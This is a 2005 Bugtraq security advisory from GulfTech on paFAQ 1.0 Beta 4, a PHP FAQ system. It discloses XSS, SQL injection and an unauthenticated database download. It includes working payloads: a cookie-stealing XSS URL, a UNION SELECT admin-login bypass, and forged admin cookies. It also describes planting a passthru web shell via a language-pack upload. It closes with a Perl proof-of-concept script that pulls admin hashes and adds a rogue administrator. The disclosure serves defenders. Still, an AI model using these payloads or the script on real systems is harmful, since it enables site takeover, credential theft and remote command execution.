Bugtraq mailing list archives
paFaq Multiple Vulnerabilities
From: GulfTech Security Research <security () gulftech org>
Date: Mon, 20 Jun 2005 09:45:01 -0500
########################################################## # GulfTech Security Research June 20th, 2005 ########################################################## # Vendor : php Arena # URL : http://www.phparena.net/pafaq.php # Version : paFAQ 1.0 Beta 4 # Risk : Multiple Vulnerabilities ########################################################## Description: paFAQ is a FAQ/Knowledge base system that allows webmasters to keep an organized database of Frequently Asked Questions; a Knowledge Database for problems and solutions. There are a number of vulnerabilities in paFaq. These vulnerabilities include arbitrary unauthorized access to the entire paFaq database, as well as admin authentication bypass, sql injection, arbitrary code execution and cross site scripting. An attacker can gain a remote shell on a vulnerable system using these vulnerabilities. Cross Site Scripting: There are some cross site scripting issues in the paFaq software. Majority of these cross site scripting issues stem from inputted variables never being sanitized properly. http:///pafaq/index.php?act=Question&id=1%3E%3Cscript%3Ealert%28 document.cookie%29%3C%2Fscript%3E These vulnerabilities can be used to render hostile code in the context of the victims browser, and in turn disclose sensitive information to an attacker. SQL Injection: There are a number of SQL Injection vulnerabilities in paFaq, but it should be noted that to exploit these issues magic quotes gpc must be off. Also, magic quotes off seems to be the default php.ini settings now so I do consider these issues fairly high risk. The most serious of the SQL Injection issues lies in the administrative login. $username = $_REQUEST['username']; $password = md5($_REQUEST['password']);$q = $DB->query("SELECT * FROM " . $DB->obj['tbl_pre'] . "admins WHERE name = '" . $username . "'");
$r = $DB->fetch_row($q); if ($r['password'] == $password) { $t = time();$DB->query("UPDATE " . $DB->obj['tbl_pre'] . "admins SET session='$t' WHERE id='".$r['id']."'");
setcookie("pafaq_user", $username, time()+3600); setcookie("pafaq_pass", $password, time()+3600); The variable $username is taken directly from the submitted login form and executed in the query, so if magic quotes gpc is off an attacker can use UNION SELECT to bypass admin authentication! http://pafaq/admin/index.php?act=login&username='%20UNION%20SELECT%20id,name, '3858f62230ac3c915f300c664312c63f',email,notify,permissions,session%20FROM%20 pafaq_admins%20WHERE%201/*&password=foobar The query above uses a UNION SELECT to get the admin username, id, email etc but we specify the password hash as the md5 encrypted value of the $password variable. If the host is vulnerable then the above link will log an attacker in as the first admin in the selected table. Additionally the "id" parameterin most of the scripts are vulnerable to SQL Injection, and can be exploited
when magic quotes gpc is set to off. Arbitrary Database Download: A very dangerous vulnerability lies in paFaq that will allow for an attacker to download the entire paFaq database. A user does not have to be logged in to exploit this vulnerability either, thus making it that more dangerous. http://path/to/pafaq/admin/backup.php An attacker can then use the encrypted password hash to gain administrative access, there is no need for an attacker to decrypt it. Cookie: pafaq_user=USERNAMEHERE; pafaq_pass=PASSWORDHASHBy adding the above cookie with the required values taken from the downloaded database an attacker now has admin access to the affected paFaq installation.
Arbitrary Code Execution: Once an attacker has administrative access to the website he can execute anyarbitrary php code by taking advantage of the upload a language pack feature.
The script does check for a "valid" language pack, but if an attacker, for example, takes the default en.php file in the language directory and adds asimple passthru($_GET['cmd']) at the bottom of the page, and then uploads the modified en.php after renaming it to something like pafaq.php as a new language pack, will be able to execute shell commands on the affected webserver by calling the malicious script in the /lang/ directory. Example /lang/pafaq.php?cmd=id;pwd
Solution:The developers were contacted and never responded. A quick workaround would be to delete the backup.php script, and turn magic quotes gpc on, or better yet
use a more secure application if deployed live on the web. Related Info: The original advisory can be found at the following location http://www.gulftech.org/?node=research&article_id=00083-06202005 Credits: James Bercegay of the GulfTech Security Research Team
#!/usr/bin/perl -w ########################################################################## # paFaq 1.0 Add Administrator PoC // By James // http://www.gulftech.org ########################################################################## use LWP::UserAgent; # Set up the LWP User Agent $ua = new LWP::UserAgent; $ua->agent("paFaq Hash Grabber v1.0"); if ( !$ARGV[0] ) { print "Usage : pafaq.pl http://path/to/pafaq"; exit; } my $key_time = time(); my $dbm_path = $ARGV[0] . '/admin/backup.php'; my $add_user = 'pafaq'; # change this? my $add_pass = 'pafaq'; # change this? my $add_email = 'pafaq () dev null'; # change this? my $add_path = $ARGV[0] . '/admin/index.php?area=users&act=doadd&name=' . $add_user . '&password=' . $add_pass . '&email=' . $add_email . '¬ify=1&can_edit_settings=1&can_edit_admins=1&can_add_admins=1&can_del_admins=1&is_a_admin=1'; print "[*] Trying Host " . $ARGV[0] . "\n"; my $dbm = $ua->get($dbm_path); if ( $dbm->content =~ /'([0-9]{1,8})',\s'(.*)',\s'([a-f0-9]{32})'/i) { print "[+] User ID Is " . $1 . "\n"; print "[+] User Name Is " . $2 . "\n"; print "[+] User Password Is " . $3 . "\n"; print "[*] Trying to add new user ...\n"; my @cookie = ('Cookie' => 'pafaq_user=' . $2 . '; pafaq_pass=' . $3); my $add = $ua->get($add_path, @cookie); if ( $add->content =~ /has been created successfully/ ) { print "[+] User $add_user Added Successfully!\n"; print "[+] User Password Is $add_pass\n"; } else { print "[!] Unable To Add User! Maybe the username is already taken? ...\n"; print "[!] Shutting Down ...\n"; exit; } } else { print "[!] The Host Is Not Vulnerable ...\n"; print "[!] Shutting Down ...\n"; exit; } exit;
Current thread:
- paFaq Multiple Vulnerabilities GulfTech Security Research (Jun 20)